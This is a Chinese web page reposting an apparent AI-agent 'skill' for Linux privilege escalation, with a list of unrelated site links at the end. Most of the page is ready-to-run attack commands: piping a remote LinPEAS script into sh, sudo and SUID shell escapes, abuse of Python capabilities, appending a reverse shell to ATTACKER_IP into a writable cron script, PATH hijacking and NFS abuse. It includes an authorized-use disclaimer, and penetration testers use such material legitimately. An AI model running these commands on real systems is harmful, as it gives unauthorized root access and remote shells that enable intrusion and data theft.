当前位置: 首页 > news >正文

【计算机工具类-操作系统Skills】linux-privilege-escalation 技能

Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.

技能概述

linux-privilege-escalation 技能在Linux系统上执行系统化权限提升评估,识别和利用错误配置、易受攻击的服务和安全弱点,从而实现从低权限用户访问到root级别控制的提升。

下载地址:https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/linux-privilege-escalation

授权使用声明:此技能仅用于授权的安全评估、防御性验证或受控的教育环境。

输入/前置条件

  • 目标Linux系统的低权限shell访问
  • 执行命令的能力(交互式或半交互式shell)
  • 反向shell连接的网络访问(如需要)
  • 攻击者机器用于托管payload和接收shell

输出/交付物

  • 目标系统上的root shell访问
  • 权限提升路径文档
  • 系统枚举发现报告
  • 修复建议

核心工作流程

阶段1: 系统枚举

# 主机名和系统角色
hostname

# 内核版本和架构
uname -a

# 详细内核信息
cat /proc/version

# 操作系统详情
cat /etc/issue
cat /etc/*-release

阶段2: 自动化枚举

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./les.sh

阶段3: 内核漏洞利用

识别内核版本并搜索漏洞:

uname -r
cat /proc/version

# 使用Linux Exploit Suggester
./linux-exploit-suggester.sh

# 手动搜索
searchsploit linux kernel [version]

阶段4: Sudo利用

# 枚举sudo权限
sudo -l

# GTFOBins sudo利用示例
sudo vim -c ':!/bin/bash'
sudo find . -exec /bin/sh \; -quit
sudo awk 'BEGIN {system("/bin/bash")}'

阶段5: SUID二进制文件利用

# 查找SUID二进制文件
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# 利用SUID二进制文件(参考GTFOBins)

阶段6: Capabilities利用

# 枚举capabilities
getcap -r / 2>/dev/null

# 利用示例
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

阶段7: Cron作业利用

# 枚举cron作业
cat /etc/crontab
ls -la /var/spool/cron/crontabs/
ls -la /etc/cron.*

# 利用可写cron脚本
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh

阶段8: PATH劫持

# 查找调用外部命令的SUID二进制文件
strings /usr/local/bin/suid-binary

# 通过在可写PATH中创建恶意二进制文件进行劫持
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service

阶段9: NFS利用

# 查找no_root_squash选项
cat /etc/exports

# 挂载共享并创建SUID二进制文件
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs

快速参考

  • 内核版本:uname -a
  • 当前用户:id
  • Sudo权限:sudo -l
  • SUID文件:find / -perm -u=s -type f 2>/dev/null
  • Capabilities:getcap -r / 2>/dev/null
  • Cron作业:cat /etc/crontab
  • 可写目录:find / -writable -type d 2>/dev/null
  • NFS导出:cat /etc/exports

关键资源

  • GTFOBins: GTFOBins
  • LinPEAS: https://github.com/carlospolop/PEASS-ng
  • Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester

约束和限制

  • 在生产环境使用前,在测试环境中验证内核漏洞
  • 失败的内核漏洞可能导致系统崩溃
  • 记录权限提升期间的所有更改
  • 仅在授权时维护访问持久性

局限性

  • 仅在任务明确匹配上述范围时使用此技能
  • 不要将输出视为环境特定验证、测试或专家审查的替代品
  • 如果缺少必需的输入、权限、安全边界或成功标准,请停止并请求澄清
http://www.jsqmd.com/news/1313277/

相关文章:

  • Grove五向开关实战指南:从硬件原理到菜单导航与无线遥控应用
  • AgentScope Java 2.0: 让Java开发者真正落地的AI Agent框架
  • Xadow与Grove接口转换器设计:打破硬件生态壁垒,实现传感器无缝互联
  • 2026年安徽分类考试复读怎么选?合肥共达校内预科班招生说明 - 小张zc
  • reCamera 2002系列网络摄像机:从开箱部署到平台集成的实战指南
  • EPSON机械手视觉引导实战:从手眼标定到系统集成的完整指南
  • Adobe全家桶下载链接
  • 终极macOS菜单栏管理工具Ice:重新定义macOS界面自定义体验
  • VC++ 2022运行库安装失败?深度排查与修复指南
  • 终极指南:如何用TFT Overlay轻松提升云顶之弈段位 [特殊字符]
  • 从CTF实战解析Modbus协议:Wireshark与Python脚本攻防技巧
  • 零代码3D重建:Meshroom开源工具终极指南
  • 扬州知途管道科技团队评测:6款主流漏水检测设备横向对比与选型建议 - 知途管道科技
  • 不用再买多个会员,在玉芬AI一站式调用多款大模型写论文
  • Xadow三轴加速度计:从硬件解析到姿态识别与运动检测实践
  • MMD Tools插件:Blender中MMD模型与动画的终极桥梁
  • ReSpeaker Core V2与Wio Link融合:构建语音交互物联网系统的实践指南
  • AI 正在执行时又想到新要求,应该打断它还是等它做完?
  • 终极指南:5分钟快速上手League Akari - 免费英雄联盟智能助手
  • 从零搭建高可用Kafka集群:原理、部署与容灾实战
  • 销售负责人怎样用 MainBody 分析订单、退款和异常商品?
  • VLC媒体播放器终极转码指南:5分钟掌握专业级视频格式转换
  • 基于springboot的教务管理系统(源码+LW+调试文档+讲解)
  • ERP系统供应商寄售模式全解析:从原理到实践落地
  • 2026年终极指南:3步免费解锁WeMod专业版完整功能
  • WarcraftHelper:为魔兽争霸III注入现代游戏体验的模块化优化方案
  • 树莓派3B硬件解析与项目实战:从物联网网关到家庭服务器
  • League Akari:英雄联盟玩家的智能助手,5大核心功能全面解析
  • RePhone与Lua物联网开发实战:从环境搭建到Modbus协议解析
  • Unity3D中基于FPSController实现OSGB倾斜摄影模型第一人称漫游方案